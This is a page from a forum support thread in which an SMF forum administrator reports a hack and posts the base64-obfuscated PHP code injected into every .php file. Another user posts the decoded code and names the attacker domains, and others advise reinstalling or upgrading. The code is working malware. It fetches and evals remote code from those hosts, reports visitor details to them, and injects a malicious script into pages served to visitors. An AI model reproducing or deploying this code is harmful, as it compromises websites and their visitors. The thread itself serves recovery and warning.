SMF Support > SMF 2.0.x Support

So I just noticed my forum got hacked. (base64_decode)

(1/4) > >>

comedorsamus:

--- Code: ---<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2RpcigkcnopKXskbXo9JHJ6O31lbHNleyRyej0kX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0uIi8ubG9ncy8iO2lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2RpcigkcnopKXskbXo9JHJ6O319ZWxzZXskbXo9JHJ6O319fWVsc2V7JG16PSRyejt9JGJvdD0wOyR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3RyaXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKCR1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlIikpJGJvdD0xOyRtc2llPTA7aWYgKGlzX21zaWVfNzc3KCR1YSkpJG1zaWU9MTskbWFjPTA7aWYgKGlzX21hY183NzcoJHVhKSkkbWFjPTE7aWYgKCgkbXNpZT09MCkmJigkbWFjPT0wKSkkYm90PTE7ICBnbG9iYWwgJF9TRVJWRVI7ICAgICRfU0VSVkVSWydzX3AxJ109JG16OyAgJF9TRVJWRVJbJ3NfYjEnXT0kYm90OyAgJF9TRVJWRVJbJ3NfdDEnXT0xMjAwOyAgJF9TRVJWRVJbJ3NfZDEnXT1iYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwyVnVjekV5TW5wNmVtUmtZWHA2TG1OdmJTOD0nKTsgICRkPSc/ZD0nLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pLiImcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUEhQX1NFTEYiXSkuIiZhPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSk7ICAkX1NFUlZFUlsnc19hMSddPWJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92TDJOdmIzQmxjbXB6ZFhSbU9DNXlkUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19hMiddPWJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92TDI1c2FXNTBhR1YzYjI5a0xtTnZiUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0ibmwucGhwP3A9ZCI7ICB9ICAgICAgc2V0dXBfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgICAgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19iMSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLmdldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3NjcmlwdCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXzc3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZGVjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkpOyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAkc3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKCR0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdGUoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcmV0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAgQEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJGRlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZWRfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJyQxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJuICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));?>
--- End code ---
This code is inserted in EVERY .php file and then some, lol. It redirects you to malicious websites.

Is there any way to edit it out or do I have to go through every file, manually editing each one of them? >.>

Thanks in advance. What a mess. :'(

Version: SMF 2.0 RC4

Ham Radio:
I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't loose anything by deleting all your files. The only thing that you will loose it pictures and avatars, so you can back up those folders, but other then that, delete them all. This happened to me recently, and that is what I did.

Colin:
Yep, this has been happening to many other forums.

ApplianceJunk:

--- Quote from: Ham Radio on April 28, 2012, 09:27:04 PM ---I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't loose anything by deleting all your files. The only thing that you will loose it pictures and avatars, so you can back up those folders, but other then that, delete them all. This happened to me recently, and that is what I did.

--- End quote ---

You would loose any custom work to themes and mods.

SikLiFe:

--- Code: ---if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
$content=@trycurl_777($url);
if($content!==false)return $content;
$content=@tryfile_777($url);
if($content!==false)return $content;
$content=@tryfopen_777($url);i
f($content!==false)return $content;
$content=@tryfsockopen_777($url);
if($content!==false)return $content;
$content=@trysocket_777($url);
if($content!==false)return $content;
return '';}  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
curl_setopt ($ch, CURLOPT_HEADER, 0);
$result = curl_exec ($ch);
curl_close($ch);if ($result=="")return false;return $result;}  function tryfile_777($url){if(function_exists('file')===false)return false;
$inc=@file($url);$buf=@implode('',$inc);
if ($buf=="")return false;return $buf;}  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}  function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];$val=get_tds_777($actual1);if ($val=="")$val=get_tds_777($actual2);$f=@fopen($tdsfile,"w");if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];$tdsfile=$dir."log1.txt";if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode("\n",$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER['s_p1']=$mz;  $_SERVER['s_b1']=$bot;  $_SERVER['s_t1']=1200;  $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=');  $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);  $_SERVER['s_a1']=base64_decode('aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw').$d;  $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw').$d;  $_SERVER['s_script']="nl.php?p=d";  }      setup_globals_777();    if(!function_exists('gml_777')){  function gml_777(){    $r_string_777='';
  if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"> </script>';  return $r_string_777;  }  }     

 if(!function_exists('gzdecodeit')){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack('v',substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header('Content-Encoding: none');  $decoded_content=gzdecodeit($content);  if(preg_match('/\<\/body/si',$decoded_content)){  return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start('mrobh');  }  }

--- End code ---

sites listed in the above code. do NOT go to these sites, but you may want to report them.

ens122zzzddazz dot com
cooperjsutf8 dot ru/g_load.php
nlinthewood dot com/g_load.php


is there a reason why you haven't upgraded to 2.0.2?
It looks like it's creating a directory somewhere, maybe a shell in one of your folders.

Navigation

[0] Message Index

[#] Next page

Go to full version